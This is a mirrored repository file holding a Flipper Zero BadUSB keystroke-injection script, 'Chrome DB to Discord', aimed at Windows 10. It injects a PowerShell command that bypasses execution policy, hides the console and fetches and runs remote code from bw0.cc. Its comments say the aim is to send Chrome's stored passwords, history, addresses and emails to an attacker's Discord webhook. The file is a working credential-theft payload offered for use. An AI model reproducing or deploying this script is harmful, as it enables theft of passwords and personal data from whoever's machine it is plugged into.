mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-03-12 21:02:51 -07:00
20 lines
739 B
Plaintext
20 lines
739 B
Plaintext
REM Title: Chrome DB to Discord
|
|
REM Author: @beigeworm
|
|
REM Description: Chrome stores visited websites, password entries, Address entries, email entries and more inside database files
|
|
REM Description: They can be extracted to a discord chat and viewed in something like 'DB Browser'.
|
|
REM Target: Windows 10
|
|
|
|
REM *SETUP*
|
|
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook Channel and Token ONLY
|
|
REM eg. $dc='1206563651960586035/sNqypsq629XmXpc9TP924Dxeox6qMHDCI5e27qJ3fw4ef34wff4wf_df3aFOY' ....
|
|
# REM To hide the console, use $hide='y' below to hide the console.
|
|
|
|
REM open powershell
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C $hide='y'; $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/chdb)
|
|
ENTER
|
|
|
|
|